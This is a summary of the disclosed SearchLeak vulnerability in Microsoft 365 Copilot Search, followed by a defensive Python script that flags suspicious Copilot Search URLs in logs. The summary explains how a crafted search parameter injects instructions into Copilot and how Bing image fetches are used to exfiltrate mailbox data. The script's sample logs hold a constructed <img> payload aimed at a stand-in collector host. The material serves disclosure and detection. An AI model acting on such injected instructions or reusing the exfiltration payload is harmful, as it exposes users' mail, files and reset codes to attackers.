Overview
- Varonis publicly disclosed the SearchLeak proof-of-concept on June 15–16; Microsoft says it has mitigated the flaw on its backend and has issued CVE-2026-42824, and because the fix is server-side, customers do not need to take action.
- SearchLeak chains three specific flaws: a parameter-to-prompt injection that turns the 'q' search parameter into instructions, an HTML rendering race that lets raw markup run before sanitization, and a Content Security Policy bypass that uses Bing’s server-side image fetch as an exfiltration proxy.
- In practice an attacker can send a signed-in user a crafted m365.cloud.microsoft search URL that makes Copilot search that user’s mailbox or files, embed the stolen text inside an image URL, and cause Bing to fetch that URL, so the attacker can read the data from their own server logs.
- The chain could expose high-value enterprise material that Copilot can index, including email contents, calendar items, OneDrive and SharePoint files, and time-sensitive items like one-time MFA or password-reset codes; researchers say there are no confirmed in-the-wild exploits reported so far.
- Because Copilot Enterprise is a managed cloud service, tenant admins cannot patch the service themselves; defenders are advised to monitor Copilot Search URLs and unusual Bing image requests, reduce what Copilot indexes, and use layered testing and detection to limit the blast radius of future flaws.
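The monitoring advice above (watch Copilot Search URLs for the SearchLeak shape: a `q` parameter that carries markup or an external URL with a long query string, which is where exfiltrated text would travel) can be turned into a simple log check. The following is an added example, not code from Varonis, Microsoft, or the original article. It assumes a proxy or email-link log in the constructed form `timestamp user url`; the host `m365.cloud.microsoft` and the `q` parameter come from the page, while the length thresholds, the indicator names, and the `collector.example.invalid` host in the sample lines are assumptions for illustration.

```python
"""Flag Copilot Search URLs whose 'q' parameter looks like a SearchLeak-style payload.

Detection-only helper (added example). Indicators are heuristics; tune MAX_Q_LEN and
MAX_EXT_QUERY_LEN against your own baseline of legitimate Copilot searches.
"""
import re
from urllib.parse import urlparse, parse_qs, quote

COPILOT_SEARCH_HOST = "m365.cloud.microsoft"  # host named in the disclosure
MAX_Q_LEN = 300            # assumption: legitimate search text is rarely this long
MAX_EXT_QUERY_LEN = 64     # assumption: long query strings on embedded URLs suggest exfil

# Any http(s) URL embedded inside the search text, and any HTML-looking tag.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def analyze_search_url(url: str) -> list:
    """Return sorted indicator names for a Copilot Search URL, or [] if nothing stands out.

    URLs on other hosts always return [] so the caller can feed in unfiltered logs.
    """
    parsed = urlparse(url)
    if parsed.hostname != COPILOT_SEARCH_HOST:
        return []
    indicators = set()
    for q in parse_qs(parsed.query).get("q", []):   # parse_qs percent-decodes for us
        if len(q) > MAX_Q_LEN:
            indicators.add("long_query")
        if MARKUP_RE.search(q):
            indicators.add("markup_in_query")       # raw markup has no place in a search term
        for embedded in URL_RE.findall(q):
            inner = urlparse(embedded)
            if inner.hostname and inner.hostname != COPILOT_SEARCH_HOST:
                indicators.add("external_url_in_query")
                if len(inner.query) > MAX_EXT_QUERY_LEN:
                    indicators.add("long_external_query_string")
    return sorted(indicators)


def scan_logs(lines) -> list:
    """Parse 'timestamp user url' lines; return (user, url, indicators) for flagged lines."""
    hits = []
    for line in lines:
        parts = line.split(maxsplit=2)
        if len(parts) != 3:
            continue  # malformed line; skip rather than crash the sweep
        _ts, user, url = parts
        indicators = analyze_search_url(url)
        if indicators:
            hits.append((user, url, indicators))
    return hits


# Constructed sample log lines (not real traffic). The 'bob' line carries an <img> tag whose
# src points at an external host with an 80-character query string; 'carol' has an oversized
# search term; 'alice' and 'dave' are benign.
_MARKER = '<img src="https://collector.example.invalid/p.png?d=' + "A" * 80 + '">'
SAMPLE_LOGS = [
    "2026-06-16T09:01:02Z alice https://m365.cloud.microsoft/search?q=" + quote("quarterly budget"),
    "2026-06-16T09:03:15Z bob https://m365.cloud.microsoft/search?q=" + quote(_MARKER, safe=""),
    "2026-06-16T09:05:44Z carol https://m365.cloud.microsoft/search?q=" + "x" * 400,
    "2026-06-16T09:06:00Z dave https://www.example.com/search?q=" + quote("<img src=x>"),
]

if __name__ == "__main__":
    for user, url, indicators in scan_logs(SAMPLE_LOGS):
        print(f"{user}: {', '.join(indicators)}  <- {url[:80]}...")
```

Run it over URLs pulled from proxy logs or from links in inbound mail; a hit on `markup_in_query` or `long_external_query_string` is worth a look even after Microsoft's server-side fix, since the same delivery shape would reappear with any future variant of the chain.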